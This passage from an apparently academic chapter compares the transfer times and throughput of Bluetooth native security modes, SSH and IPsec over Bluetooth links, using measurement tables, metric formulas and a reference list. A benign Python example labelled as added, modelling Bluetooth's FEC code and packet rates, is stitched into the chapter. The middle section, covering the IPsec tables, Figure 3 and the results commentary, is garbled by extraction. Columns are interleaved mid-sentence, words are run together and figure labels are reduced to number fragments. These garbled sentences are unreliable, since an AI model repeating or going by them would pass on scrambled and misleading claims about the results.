our tests we decided to use only security modes I and III. Security mode I offers no real security, as authentication and confidentiality services are disabled. On the other hand, security mode II provides security services after the connection between the two devices has been established and only if a given application has requested them. Thus, the security services in mode II depend on the application running. The last security mode is the most powerful among the three modes because it mandates both authentication and confidentiality built-in mechanisms independently of the application running. These mechanisms are referred to as Bluetooth baseband security procedures, where the baseband layer deals with the SAFER+ algorithms (Massey, Khachatrian, & Kuregian, 1998). As implied, one of the terminals was acting as a client and the other one as the server. Therefore, the server should require security and the client should respond accordingly.

For IPsec, the engaged machines must have the same security policies in order to communicate securely. So, we configured Linux to use the MD5 and SHA1 algorithms for data integrity and the DES and 3DES algorithms for confidentiality in both machines by installing IPsec-tools (http://ipsec-tools.sourceforge.net/) and Openswan (www.openswan.org) as well. For SSH secured communication we used OpenSSH. In fact, many open-source projects exist. In addition to FreeSWAN and Openswan, which both enable IPsec in the Linux kernel, OpenVPN (http://openvpn.net/) can be used to create TLS-encrypted point-to-point connections. For SSH confidentiality services we chose four algorithms to test, namely 3DES, AES, Arcfour, and Blowfish. Finally, for both IPsec and SSH we employed only symmetric cryptography and manual keying procedures for the authentication of parties, considering the fact that usually Bluetooth piconets are formed ad hoc and their users do not hold public key certificates.

Performance Measures

As mentioned before, the experimental procedure consists of three main parts: evaluation of Bluetooth built-in security modes I (no security) and III

Table 1. Hardware and software characteristics of the engaged machines

First pair
  Laptop server
    Processor:          Intel Celeron M, 1.4 GHz
    RAM:                256 MB
    Operating System:   SUSE Linux Ver. 10.0
    Bluetooth Adapter:  Trust Bluetooth adapter Class 1
  Palmtop client
    Model:              HP iPAQ h540
    Processor:          400 MHz Intel XScale PXA250
    RAM:                64 MB
    Operating System:   Familiar PDA OS 0.8.4
    Bluetooth Adapter:  Bluetooth 1.1 compliant

Second pair
  Laptop client and server
    Processor:          Intel Celeron M, 1.4 GHz
    RAM:                256 Mbytes
    Operating System:   SUSE Linux Ver. 10.0
    Bluetooth Adapter:  Trust Bluetooth adapter Class 1



(strong security), and estimation of the performance of IPsec and SSH mechanisms over Bluetooth links. In all scenarios we gathered measurements for the following network performance parameters: absolute file transfer time (TT), achieved transfer rate (ATR), and throughput (THR). All measurements took place at the server node because of its processing power.

• The Transfer_Time represents the actual duration of transfers during a transaction.
• The Achieved_Transfer_Rate represents the actual transfer rate achieved during a transaction. In an ideal scenario, a constant data rate should be maintained between the two communication end-points. However, due to various reasons, mainly related to the nature of the wireless medium, this parameter changes over time. We should underline the fact that bytes_sent and bytes_received could also contain retransmitted bytes.
  Achieved_Transfer_Rate(Kbps) = ((bytes_sent + bytes_received) * 8) / TT
• Throughput represents the percentage of Achieved_Transfer_Rate over the practical maximum_transfer_rate of the link, which in our case is 723 Kbps:
  Throughput(%) = achieved_transfer_rate / max_transfer_rate * 100
• Finally, Achieved_Transfer_Rate_Improvement is a comparison metric that indicates the improvement of the Achieved_Transfer_Rate with respect to the Bluetooth mode I achieved transfer rate, Achieved_Transfer_Rate_B_I, and is calculated as:
  Achieved_Transfer_Rate_Improvement(%) = (ATR - ATR_B_I) / ATR_B_I * 100

A positive value implies that the performance (or channel throughput) has increased compared to the Bluetooth mode I achieved transfer rate, while a negative one means that the performance has

Figure 2. Average metric values for network parameters measured/Bluetooth Modes I and III (three plots against file size, Mode I versus Mode III: transfer times (TT) in seconds, throughput (THR) in percent, and achieved transfer rate (ATR) in Kbps)

decreased. Measurements were gathered during repeated FTP file transfers, between the laptop server and the PDA client on the one hand and between the laptop client and server on the other. Each file was transferred twelve times and only the average values were recorded. In all scenarios, the ping response times between client and server varied between 19.7 and 21.8 msecs. Due to space limitations, in the following first three subsections we present only the analytical results derived from the laptop server/PDA client pair, which is without doubt the most interesting one, while some indicative corresponding comparisons with the other laptop client–server pair are exhibited in the subsection titled "Comparison Between PDA and Laptop Clients."

Bluetooth Security Modes I and III Evaluation

Measurements for testing Bluetooth modes I and III were gathered by transferring four different files between each client–server pair. The files' sizes were 5.26, 7.0, 10.5, and 15 Mbytes, respectively. Figure 2 provides a graphical representation of these values, comparing the TT times achieved in the PDA client–laptop server piconet. As we can easily notice, the results are generally as expected, but there are some interesting points which need further analysis. At first, the TT metric is slightly higher for mode III, while the ATR is higher for mode I. This happens because mode III mandates authentication (handshake) at the beginning of each transaction. Keep in mind that the handshake time is included in TT too. Moreover, encryption algorithms are applied during the transaction for mode III and as a result the overall transfer time is increased. We can also perceive that the larger the file size is, the longer the TT difference between mode I and mode III is expected to be. This situation is also depicted in the respective plot of Figure 2. In general, these measurements advocate that mode I utilizes the network better than mode III. Because of the volatile nature of the wireless link, we also report the standard deviation (SD) for the measured values in Table 2.

Table 2. Standard deviation for all Bluetooth scenarios

                  MODE I                           MODE III
File Size (MB)    TT (sec)  ATR (Kbps)  THR (%)    TT (sec)  ATR (Kbps)  THR (%)
5.26              0.5       2.6         0.4        0.1       1.3         0.2
7                 0.1       0.9         0.1        0.5       3.2         0.4
10.5              0.4       1.6         0.2        0.1       0.5         0.1
15                0.2       0.5         0.1        0.6       2.2         0.3

Secure Shell (SSH) Evaluation

Experimental procedures for the SSH mechanism (IETF, 2006; OpenSSH, 2006) consider the transfer of the same four files, as before, between the client and the server. Table 3 displays the average values of all metrics used, while Table 4 presents the corresponding standard deviation values.

As we can notice, SSH gives highly increased transfer times when compared to the Bluetooth security modes. For instance, we can spot a difference of +12.6 seconds to +13.4 seconds for the smallest file depending on the cipher used. Moreover, it is more than obvious that all the ciphers used are more or less of the same performance. This is easily proven if we examine, for example, the achieved transfer rates in each case, which show very slight differences.

Another interesting observation that we can make is that as the size of the file increases, the achieved transfer rate and the throughput become bigger. This happens because of the authentication procedure which takes place during the initial SSH handshake. In any case it should be noted that the improvements in the achieved transfer rates induced by SSH, always compared to Bluetooth security mode I, are negative for every scenario. This means that Bluetooth's native mechanisms offer better bandwidth and network utilization in almost all cases examined. This remark is confirmed by the values given in Table 5.

Table 3. Average values for network parameters measured (SSH)

            5.26 MB                          7 MB
Cipher      TT (sec)  ATR (Kbps)  THR (%)    TT (sec)  ATR (Kbps)  THR (%)
3DES        90.1      526.4       72.8       116.9     555.6       76.9
AES128      90.2      525.6       72.7       116.9     556.2       76.9
Arcfour     90.5      523.8       72.5       117.3     554.2       76.6
Blowfish    90.5      523.6       72.4       117.6     552.8       76.4

            10.5 MB                          15 MB
Cipher      TT (sec)  ATR (Kbps)  THR (%)    TT (sec)  ATR (Kbps)  THR (%)
3DES        163.0     581.8       80.5       221.3     603.2       83.4
AES128      162.9     582.4       80.5       221.3     603.6       83.5
Arcfour     163.1     581.6       80.5       221.6     602.4       83.3
Blowfish    162.8     582.6       80.6       222.1     601.2       83.1

Table 4. Standard deviation for all SSH scenarios

            5.26 MB                          7 MB
Cipher      TT (sec)  ATR (Kbps)  THR (%)    TT (sec)  ATR (Kbps)  THR (%)
3DES        0.4       2.1         0.3        0.4       2.1         0.3
AES128      0.9       5.5         0.7        0.4       1.9         0.2
Arcfour     0.1       0.4         0.1        0.2       1.1         0.2
Blowfish    0.6       3.8         0.5        1.0       4.9         0.7

            10.5 MB                          15 MB
Cipher      TT (sec)  ATR (Kbps)  THR (%)    TT (sec)  ATR (Kbps)  THR (%)
3DES        1.0       3.3         0.5        0.8       2.5         0.3
AES128      1.0       3.9         0.5        0.9       2.3         0.3
Arcfour     0.5       1.9         0.3        0.6       1.7         0.2
Blowfish    0.6       1.9         0.3        0.7       1.9         0.3

Table 5. % ATR deterioration for SSH

Size (MB)   Bluetooth Mode I (Kbps)   3DES    AES128   RC4     Blowfish
5.26        618.0                     -14.8   -15.0    -15.2   -15.3
7           620.2                     -10.4   -10.4    -10.6   -10.9
10.5        621.2                     -6.3    -6.2     -6.4    -11.0
15          621.4                     -2.9    -2.9     -3.3    -3.3

IPsec Evaluation

The procedure for the IPsec protocol (Kent & Atkinson, 1998a, 1998b) considers once again the transfer of the same four files between the client and the server. IPsec uses two mechanisms (protocols) that may be used independently or jointly to secure the outgoing traffic, namely the authentication header (AH), offering data origin, connectionless


Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

TableAverage
6. valuesfornetworkparametersmeasured(IPsec)
5.26 MB 7 MB
TT ATR THR TT ATR THR
(sec) (Kbps) (%) (sec) (Kbps) (%)
AH_MD5 72.8 683.4 94.5 100.0 682.8 94.4
AH_SHA1 72.8 683.2 94.5 99.9 683.0 94.5
ESP_DES_MD5 74.4 681.0 95.0 102.0 686.6 95.0
ESP_3DES_MD5 73.8 681.0 95.7 102.2 685.2 94.8
ESP_DES_SHA1 74.2 680.0 95.2 102.0 686.6 95.0
ESP_3DES_SHA1 74.2 681.0 95.2 101.8 688.2 95.2
10.5 MB 15 MB
AH_MD5 145.9 682.6 94.4 205.2 683.4 94.5
AH_SHA1 145.7 683.4 94.5 205.1 683.8 94.6
ESP_DES_MD5 148.6 688.2 95.2 208.9 688.8 95.3
ESP_3DES_MD5 148.6 687.8 95.1 209.1 688.0 95.2
ESP_DES_SHA1 148.5 688.4 95.2 209.2 688.0 95.2
ESP_3DES_SHA1 148.6 688.0 95.2 210.5 683.6 94.6

Table 7. Standard deviation of measurements of all IPsec scenarios


5.26 MB 7 MB
TT ATR THR TT ATR THR
(sec) (Kbps) (%) (sec) (Kbps) (%)
AH_MD5 0.0 0.5 0.05 0.1 0.8 0.12
AH_SHA1 0.1 0.4 0.1 0.1 0.0 0.05
ESP_DES_MD5 0.1 0.4 0.1 0.3 2.1 0.28
ESP_3DES_MD5 0.5 4.5 0.6 1.3 8.6 1.19
ESP_DES_SHA1 0.0 0.4 0.06 0.6 3.7 0.53
ESP_3DES_SHA1 0.0 0.4 0.06 0.1 0.4 0.1
10.5 MB 15 MB
AH_MD5 0.1 0.5 0.06 0.2 0.5 0.08
AH_SHA1 0.2 0.9 0.1 0.1 0.4 0.03
ESP_DES_MD5 0.1 0.8 0.09 0.1 0.4 0.04
ESP_3DES_MD5 0.1 0.8 0.08 0.1 0.0 0.03
ESP_DES_SHA1 0.0 0.5 0.02 0.3 1.0 0.13
ESP_3DES_SHA1 0.1 0.7 0.06 2.4 7.6 1.05

data integrity, and optionally replay protection, vices. Note however that MD5 is not considered
and encapsulating security payload (ESP) offering secure anymore and is reported here for the sake of
confidentialityandprotectionagainst - trafficanaly
completeness. In total, we deployed six scenarios
sis. In our scenarios we utilized both mechanisms, as shown in Table 6.
using the MD5 and SHA1 algorithms for integrity First and foremost, all network metrics for IPsec
andDESandDES 3 tosupportconfidentiality - areser
remarkably concentrated. Standard deviation


Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

values rendered in Table 7 confirm this remark.


comparison between PdA and
Surprisingly, IPsec gives better transfer times laptop clients
forallfilesizeswhencomparedtoBluetoothand
SSH.Thisisalsoconfirmedby%ATRimprove - Considering the second experimental pair, which
ment for IPsec shown in Table 8. In particular, all employs laptops for both the server and the client
IPsec times are very close to those of Bluetooth’s (see Table 1), TT times were better for all the cor-
mode I, while at the same time are considerably responding scenarios, namely Bluetooth native
better than SSH’s. Note, that IPsec renders 210.5 security modes, SSH and IPsec. For instance,
seconds as the highest time duration for transferring Bluetooth modes show a slight TT improvement
thebiggestfile,whilecorrespondinglyranging SSHgives from 1 to 3 seconds depending on the
222.1 seconds, mode III produces 213.2 seconds, file size. Specifically, TT for the 7 MB file was
and mode I 211.6 seconds. This is partially due 102.8 and 106.5 for Bluetooth mode I and III,
to substantially increased (and highly stabilized) respectively. Approximately the same situation is
bandwidth that IPsec generates. The aforemen- reported for SSH and IPsec as depicted in Figure
tionedobservationsarealsoconfirmed bythe
3. This factas the laptop client incorporates
is expected
that during IPsec measurements we had a very a faster CPU and thus gains more in cryptographic
low rate of packet loss reported by the Ethereal operations that SSH and IPsec mandate. The same
utility. It is important to note that the throughput remark is applied for the other two network per-
was better when using ESP. On the contrary, when formance parameters, throughput and ATR. As in
usingAH,thethroughputfortransferring the
the PDA files
client case, IPsec continues to perform
was lower. This can be explained by the fact that better under all circumstances for the laptop client
authentication is applied in AH. due to its throughput optimization. However, IPsec

TableATR
8.% improvementforIPsec
AH_ ESP_DES_ ESP_3DES_
File Bluetooth
MD5 SHA1 MD5 SHA1 MD5 SHA1
Size Mode_I
5.26 618.0 10.6 10.6 11.1 11.4 11.9 11.4
7 620.2 10.1 10.1 10.7 10.7 11.5 11.0
10.5 621.2 9.9 10.0 10.8 10.8 10.7 10.8
15 621.4 10.0 10.0 10.8 10.7 10.7 10.0

Figure 3. Comparison of network transfer times between Laptop and PDA clients
ssH transfer tim e (7 Mb) IPsec transfer tim e (7 Mb)
.0 0.
0.
. . 0.0
.0 0.0
. 0.0
. 0.
.0 0.
0.
seconds

0.
0.0
seconds

.0 Laptop client 0.0 0.0


00.
PDA client 00. 00.
.0
0. Laptop client
00.0 . PDA client
0.0
0. 0. 00.0
.
0.0
0. D    A A
_M HA MD MD SH SH
0.0 AH _S S_ S_ S_ _
AH DE DE E ES
P_ P _ P _D _ D
DES AES Arcfour Blow fish ES ES ES SP
E


Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

TT times remain very close to those of Bluetooth bits is encoded into a 15 bit codeword, and is capable
securitymodes.Thesamesituationisof confirmed
correcting single bit error in each block. Table
by the minimum standard deviation values that 9 shows the different ACL packet types and their
characterize the IPsec case. Also in this case, SSH properties. The values in the table are theoretical
gives the worst performance compared with IPsec without packet overhead. For example, over an
and Bluetooth native security modes. ACL link using DH5, one can send about 300 to
320 kbit/s of UDP user data, while the theoretical
limit is 433.9 kbit/s.
coMMEnts on tHE rEsults This means that in order to overcome the effect
of low and varying link quality on throughput,
This section provides a comparative view of the the selection of the optimal link layer packet size,
conducted results. Also, we attempt to provide a under estimated channel conditions, is crucial.
better explanation of the experiment outcomes. Indeed some research work (Chen, Kapoor, Sana-
But before that we must shortly discuss important didi, & Gerla, 2004) points this out by evaluating
characteristics of Bluetooth connections that may the “optimal” link layer packet size based on the
affect the performance of the connection. Bluetooth current bit error rate of the channel. Moreover, in
employs frequency hopping spread spectrum regions that Wi-Fi networks coexist with Bluetooth
(FHSS) to avoid interference. There are 79-23 in and because Wi-Fi and Bluetooth utilize spectrum
some countries-hopping frequencies, each having in different ways, they can cause considerable
a bandwidth of 1MHz. Frequency hopping is as- interference between each other (depending on
sisted with fast automatic repeat request ARQ)
( ,
the relative location of the 802.11b and Bluetooth
cyclic redundancy check (CRC), and forward error devices) (Yip & Kwok, 2004). By transmitting at
correction (FEC) to achieve high reliability on the the highest power level, Bluetooth class 1 devices
wireless links. All the data/control packet transmis- would create more interference than Bluetooth’s
sions are synchronized by the master. Slave units class 2 and class 3 devices, which transmit at
can only send in the slave-to-master slot after being lower power levels. Furthermore, because each
addressed in the preceding master-to-slave slot, Bluetooth PAN will occupy the entire ISM band,
with each slot lasting 625 microseconds. two or more coexisting Bluetooth PANs will oc-
For real-time data such as video, synchronous casionally collide, possibly causing loss of data
connection oriented (SCO) links are used, while packets. Of course, apart from implementation
for data transmission, asynchronous connectionless issues (e.g., protocol stacks), the aforementioned
link (ACL) links are employed. There are several parameters are closely related and can affect real
ACL packet types, differing in packet length and Bluetooth connections and the results gathered
whether they are FEC coded or not. The FEC cod- in this chapter. For instance, all experiments
ing scheme used in ACL DM mode is a shortened were conducted inside the coverage area of the
Hamming code, where each block of 10 information University’s hot-spot.

Table9.PackettypesforBluetoothACLConnections(theoreticalvalues)
Mode FEC Packet (bytes) Size (kbps) Symmetric (kbps) Asymmetric (kbps)
DM1 2/3 0-17 108.8 108.8 108.8
DM3 2/3 0-121 258.1 387.2 54.4
DM5 2/3 0-227 286.7 477.8 36.3
DH1 no 0-27 172.8 172.8 172.8
DH3 no 0-183 390.4 585.6 86.4
DH5 no 0-339 433.9 723.2 57.6
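The FEC scheme and the packet-type rates described above, worked through as an added example (this is not the chapter's own code): a model of the (15,10) shortened Hamming code used by DM packets, with syndrome decoding that corrects one flipped bit per block and flags two, plus the slot-timing arithmetic that reproduces the theoretical rates of Table 9. The generator polynomial g(D) = (D+1)(D^4+D+1), the 224-byte DM5 user payload and the `link_utilization` helper are assumptions of this example, not values stated on the page.

```python
"""Bluetooth ACL packet arithmetic: the (15,10) shortened Hamming FEC of DM
packets and the theoretical user-data rates of Table 9 derived from the
625 microsecond slot clock.  Added example with constructed inputs."""
from typing import Dict, List, Optional, Tuple

# Generator polynomial g(D) = (D+1)(D^4+D+1) = D^5 + D^4 + D^2 + 1 as a bit
# mask.  Assumption: this is the polynomial the Bluetooth baseband
# specification gives for the DM-packet FEC; the chapter only names the code.
FEC_GEN = 0b110101
INFO_BITS, CODE_BITS = 10, 15
PARITY_BITS = CODE_BITS - INFO_BITS


def _poly_mod(value: int, divisor: int) -> int:
    """Remainder of value(D) / divisor(D) over GF(2), polynomials as ints."""
    dlen = divisor.bit_length()
    while value.bit_length() >= dlen:
        value ^= divisor << (value.bit_length() - dlen)
    return value


def fec_encode(info: int) -> int:
    """Systematic (15,10) encoding: 10 information bits then 5 parity bits."""
    if not 0 <= info < (1 << INFO_BITS):
        raise ValueError("information word must fit in 10 bits")
    shifted = info << PARITY_BITS
    return shifted | _poly_mod(shifted, FEC_GEN)


# Syndrome of each single-bit error pattern.  All 15 are distinct (D^4+D+1 is
# primitive), so one lookup corrects any single error.  A double error gives a
# syndrome that is neither zero nor in this table, because the code's minimum
# distance is 4, so it is detected but cannot be corrected.
_SYNDROME_TO_ERROR: Dict[int, int] = {
    _poly_mod(1 << i, FEC_GEN): 1 << i for i in range(CODE_BITS)
}


def fec_decode(codeword: int) -> Tuple[Optional[int], int]:
    """Return (information word, number of corrected bits).  The information
    word is None when the block carries an error the code cannot correct."""
    syndrome = _poly_mod(codeword, FEC_GEN)
    if syndrome == 0:
        return codeword >> PARITY_BITS, 0
    error = _SYNDROME_TO_ERROR.get(syndrome)
    if error is None:
        return None, 0
    return (codeword ^ error) >> PARITY_BITS, 1


def fec_encode_payload(payload: bytes) -> List[int]:
    """Cut a payload into 10-bit blocks, zero-padding the last one, and encode
    each block.  The 2/3 FEC rate listed in Table 9 is exactly 10/15."""
    nbits = len(payload) * 8
    pad = (-nbits) % INFO_BITS
    bits = int.from_bytes(payload, "big") << pad
    nbits += pad
    return [fec_encode((bits >> (nbits - INFO_BITS * (i + 1))) & 0x3FF)
            for i in range(nbits // INFO_BITS)]


SLOT_SEC = 625e-6
# Maximum user payload (bytes) and slots occupied per ACL packet type.
# Assumption: 224 user bytes for DM5, the figure that reproduces the kbps
# values of Table 9.
ACL_TYPES: Dict[str, Tuple[int, int]] = {
    "DM1": (17, 1), "DM3": (121, 3), "DM5": (224, 5),
    "DH1": (27, 1), "DH3": (183, 3), "DH5": (339, 5),
}


def acl_rates_kbps(name: str) -> Tuple[float, float, float]:
    """Theoretical (symmetric, asymmetric forward, asymmetric reverse) rates in
    kbps.  An n-slot packet is answered in the following slot: symmetric
    traffic sends the n-slot packet both ways (2n slots per exchange),
    asymmetric traffic answers it with the 1-slot packet of the same family
    (n+1 slots).  Packet overhead is ignored, as in Table 9."""
    payload, slots = ACL_TYPES[name]
    reverse_payload, _ = ACL_TYPES[name[:2] + "1"]
    symmetric = payload * 8 / (2 * slots * SLOT_SEC)
    forward = payload * 8 / ((slots + 1) * SLOT_SEC)
    reverse = reverse_payload * 8 / ((slots + 1) * SLOT_SEC)
    return symmetric / 1000, forward / 1000, reverse / 1000


def link_utilization(measured_kbps: float, name: str) -> float:
    """Fraction of the symmetric theoretical rate actually achieved, e.g. the
    chapter's 300-320 kbit/s of UDP data over DH5 against 433.9 kbit/s."""
    return measured_kbps / acl_rates_kbps(name)[0]


if __name__ == "__main__":
    word = 0b1011001110  # constructed 10-bit information word
    block = fec_encode(word)
    print(f"{word:010b} -> {block:015b}; bit 7 flipped ->",
          fec_decode(block ^ (1 << 7)))
    for kind in ACL_TYPES:
        print(kind, tuple(round(r, 1) for r in acl_rates_kbps(kind)))
    print("DH5 utilization at 310 kbit/s:", round(link_utilization(310, "DH5"), 2))
```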


In the following, we present comparative graphs only for two of the three network parameters, transfer times and throughput, for the PDA client. As already noted in "Comparison between PDA and Laptop Clients," the laptop client scenario results are directly comparable with those of the PDA client and thus do not contribute further to this discussion. Consequently, Figure 4 illustrates a comparison of the transfer times for six selected scenarios in total. We easily spot that all times, especially for file sizes smaller than 10.5 MB, seem to be highly concentrated. This means that (excluding the SSH ones) we have marginal differences between the performances of the conducted scenarios. But, the bigger the size gets, the difference tends to slightly decrease. Apart from the fact that all tests have the Bluetooth link parameter in common, this can be explained by the fact that Bluetooth modes and IPsec utilize the network better.

On the downside, SSH does not always provide peak network performance because it traditionally has been more focused on providing security. In a nutshell, SSHv2 introduced an additional form of flow control that requires the receiver to ACK each packet before more packets can be sent. Most implementations seem to use packet sizes of 16K or occasionally 32K, with some going as low as 4K. This means that no matter how fast the link, every 16K for example, the transmission stops for one round trip time awaiting the other side to send its ACK (referred to as a window adjust in SSHv2 terminology). In addition to the protocol-level handbrake, the SSH file transfer protocol (SFTP) that runs on top of SSH contains its own handbrake. This protocol recommends that reading and writing is limited to less than 32K of data, even though it is running over the reliable SSH transport which in turn runs over the reliable TCP/IP transport. One common implementation limits SFTP packets to 4K bytes, resulting in a mere 4% link utilization in the previously-presented scenario.

Figure 4. Comparison of network transfer times for six different scenarios (PDA client) (series: MODE I, MODE III, DES, Blowfish, AH_SHA, ESP_DES_SHA; x-axis: file sizes; y-axis: seconds)

Finally, Figure 5 depicts a comparison of the achieved throughput for the specific six scenarios. This plot gives a clearer idea about the achieved network performance. In short, IPsec scenarios visibly have the best performance by far, followed closely by the two Bluetooth security modes. Moreover, we can make a very important observation about SSH's performance. It is obvious that SSH's throughput increases as the file's size increases. This happens because of the handshaking phase which takes place during the initialization of each transaction. So, as the size of the transferred file increases, the impact of handshaking decreases and thus we notice an increase in the throughput. We should also report that the throughput of the other two scenarios remains more or less stable for all the file sizes we utilized. Another important issue is that during the experiments we observed a significant rate of packet loss for both Bluetooth security modes and SSH scenarios, affecting their overall performance. Certainly, the main reason for this is the volatile nature of the wireless connection itself.

Additionally, it is well known that the addition of an IPsec header may cause IP fragmentation. However, the main concern in IPsec overhead is in the encryption, decryption, and authentication of the actual IPsec (ESP and/or AH) packets. Tunnel setup and rekeying occur much less frequently than packet processing and, except in highly unusual circumstances, their overheads are not worth worrying about. According to some other works (e.g., FreeSwan, 2002) utilizing low-end machines, a 60 MHz Pentium running a host-to-host tunnel to another machine shows an FTP throughput of slightly over 5 Mbit/s either way. Thereafter, we can conclude that in our case the IPsec mechanisms running on "relatively" low-end processors are not really a bottleneck. The overall performance is rather affected most by the quality of the Bluetooth link itself, meaning that due to better utilization of the link and possibly due to the optimal ACL scheme and lower packet drop rate, IPsec performs slightly better than native Bluetooth modes do.

In Figure 6, we present some indicative Ethereal screens that attest why in practice IPsec performs better than the other two in terms of the additional protocol overhead induced. These screens illustrate the overall network statistics for Bluetooth mode III and IPsec AH_MD5, respectively. The "Data" section corresponds to the overall percent of data that were sent from the server towards the PDA client for the 5.26 MB file. We observe that IPsec needs a considerably lower percent of TCP data packets to complete the transaction (49.63%) than Bluetooth mode III, which requires 66.24%. Note that, excluding ARP messages, the remaining percent corresponds to control information sent from the client to the server including ACKs, retransmissions, and so forth. Therefore, IPsec utilizes the link better, achieving higher performance.

Figure 5. Comparison of network throughput for six different scenarios (PDA client) (series: MODE I, MODE III, DES, Blowfish, AH_SHA, ESP_DES_SHA; x-axis: file sizes; y-axis: percentage (%))

Another important factor that may affect the conducted results is the operating system itself. For that we performed partial measurements using the Windows XP operating system in the laptop client, while keeping all the other test-bed parameters unchanged. Under this setting, we observed significantly fewer packet retransmissions and logged fairly better times. For example, for Bluetooth mode III and file size 10.5 MB we got an average transfer time of 150 seconds, namely 5 seconds better than Linux. One can presume that the Bluetooth stack is better implemented in Windows than in Linux, or the Bluetooth adapters that we used perform better under Windows, perhaps due to their drivers' implementation. Nevertheless, a detailed analysis of this behavior between the two major operating systems is necessary but left for future work. An additional interesting research question is whether the recent updates of the Bluetooth specification to version 2.1, which have introduced significant changes in the Bluetooth protocol stack, including optional flow control, can affect the performance of the security mechanisms under investigation (Misic, Chan, & Misic, 2005). However, this is out of the scope of the current chapter.

Figure 6. Ethereal screens with protocol hierarchy statistics (PDA client)

For the laptop client we also provide some indicative metrics concerning the physical memory consumption for the three categories of scenarios. More specifically, memory consumption for Bluetooth modes I and III was 552 KB, which is the "pand" daemon. For SSH we have an additional 1920 KB, thus in total 2472 KB ("sshd" and "pand" daemons), and finally for the IPsec case we have 4027 KB ("pluto" and "pand" daemons).

Conclusion and Future Work

This chapter addresses performance issues for Bluetooth host-to-host connections. Three distinct categories of scenarios were used to test whether well respected security mechanisms of the Internet and application layers of the TCP/IP suite are advantageous when deployed over Bluetooth PANs compared to Bluetooth native security modes. The results disclose that IPsec better utilizes the wireless link and thus provides radically improved transfer times when compared with SSH. Native Bluetooth modes' service times are close to those of IPsec, thus significantly better than the SSH ones. On the other hand, there is an important disadvantage, which is the high amount of memory resources IPsec consumes.

As future work we would like to expand this study, investigating the performance of asymmetric cryptography mechanisms, for example, public key certificates, and to support authentication services in the context of such protocols that promote automatic keying. Another direction is to detect how much energy is required for this sort of secure connections, as mobile devices cannot afford batteries with unlimited capacity.

Acknowledgment

We would like to thank Mr. Alexis Andreadis and Mr. Paganos Charalampos for helping us with the network measurements.

References

Adam, L. (2003). Serious flaws in Bluetooth security lead to disclosure of personal data. Retrieved October 14, 2007, from http://www.bluestumbler.org

Bluetooth SIG. (2003, November 1). Specification of the Bluetooth system: Architecture & technology overview (Version 1.2). Retrieved October 14, 2007, from http://www.bluetooth.com

Chen, L., Kapoor, R., Sanadidi, M. Y., & Gerla, M. (2004). Enhancing Bluetooth TCP throughput via link layer packet adaptation. In Proceedings of the IEEE ICC '04 (Vol. 7, pp. 4012-4016).

De Morais Cordeiro, C., Sadok, D., & Agrawal, D. P. (2001). Modeling and evaluation of Bluetooth MAC protocol. In Proceedings of the Tenth International Conference on Computer Communications and Networks (pp. 518-522).

Francia, G., Kilaru, A., Le Phuong, & Vashi, M. (2004). An empirical study of Bluetooth performance. In Proceedings of the 2nd Annual Conference on Mid-South College Computing, ACM International Conference Proceeding Series (Vol. 61, pp. 81-93).

FreeSwan. (2002). Performance of FreeSwan. Retrieved October 14, 2007, from http://www.freeswan.org/freeswan_trees/freeswan-1.95/doc/performance.html

Gehrmann, C., & Nyberg, K. (2002). Enhancements to Bluetooth baseband security. Ericsson Mobile Communications AB, Ericsson Research.

Gehrmann, C., Persson, J., & Smeets, B. (2004). Bluetooth security. Artech House Publishers.

Golmie, N., & Rebala, O. (2003). Techniques to improve the performance of TCP in a mixed Bluetooth and WLAN environment. In Proceedings of the IEEE International Conference on Communications, ICC, Anchorage, AK (pp. 1181-1185).

Howitt, I. (2002). Bluetooth performance in the presence of 802.11b WLAN. IEEE Transactions on Vehicular Technology, 51(6), 1640-1651.

IEEE. (2002). Wireless PAN medium access control (MAC) and physical layer (PHY) specification. IEEE standard 802.15.1. New York: IEEE. Retrieved October 14, 2007, from http://www.ieee802.org/15/

IETF. (2006). IETF secure shell (secsh) working group. Retrieved October 14, 2007, from http://tools.ietf.org/wg/secsh/

Jacobson, M., & Wetzel, S. (2001). Security weaknesses in Bluetooth. In Proceedings of the Conference on Topics in Cryptology: The Cryptographer's Track at RSA (LNCS 2020, pp. 176-191).

Karnik, A., & Kumar, A. (2000). Performance analysis of the Bluetooth physical layer. In Proceedings of the IEEE International Conference on Personal Wireless Communications (pp. 70-74).

Kent, S., & Atkinson, R. (1998a). IP authentication header (AH) (IETF RFC 2402).

Kent, S., & Atkinson, R. (1998b). IP encapsulating security payload (ESP) (IETF RFC 2406).

Massey, J., Khachatrian, G., & Kuregian, M. (1998). Nomination of SAFER+ as candidate algorithm for the advanced encryption standard (AES). In Proceedings of the 1st Advanced Encryption Standard Candidate Conference. Retrieved October 14, 2007, from www.ee.princeton.edu/~rblee/safer+

Miorandi, D., Caimi, C., & Zanella, A. (2003). Performance characterization of a Bluetooth piconet with multi-slot packets. In Proceedings of the WiOpt'03.

Misic, J., Chan, K. L., & Misic, V. B. (2005). TCP traffic in Bluetooth 1.2: Performance and dimensioning of flow control. In Proceedings of WCNC '05 (pp. 1798-1804).

OpenSSH. (2006). OpenSSH project home page. Retrieved October 14, 2007, from http://www.openssh.org

Persson, K., & Manivannan, D. (2003). Secure connections in Bluetooth scatternets. In Proceedings of the 36th Annual Hawaii International Conference on System Sciences (HICSS '03) (p. 314b).

Shaked, Y., & Wool, A. (2005). Cracking the Bluetooth PIN. In Proceedings of the 3rd ACM International Conference on Mobile Systems, Applications, and Services (pp. 39-50). ACM Press.

Wang, F., Arumugam, N., & Krishna, G. H. (2002). Performance of a Bluetooth piconet in the presence of IEEE 802.11 WLANs. In Proceedings of the 13th IEEE International Symposium on Personal, Indoor and Mobile Radio Communications (Vol. 4, pp. 1742-1746).

Yip, H. K., & Kwok, Y-K. (2004). A performance study of packet scheduling algorithms for coordinating colocated Bluetooth and IEEE 802.11b in a Linux machine. In Proceedings of the 7th International Symposium on Parallel Architectures, Algorithms and Networks (ISPAN'04).

Yujin, L., Jesung, K., Sang, L. M., & Joong, S. M. (2001). Performance evaluation of the Bluetooth-based public Internet access point. In Proceedings of the 15th International Conference on Information Networking (pp. 643-648).

Key Terms

Bluetooth: An industrial specification for wireless personal area networks (PANs). Bluetooth provides a way to connect and exchange information between devices such as mobile phones, laptops, PCs, printers, digital cameras, and video game consoles via a secure, globally unlicensed short-range radio frequency.

Goodput: The application level throughput, that is, the number of useful bits per unit of time forwarded by the network from a certain source address to a certain destination, excluding protocol overhead, retransmissions, and so forth.

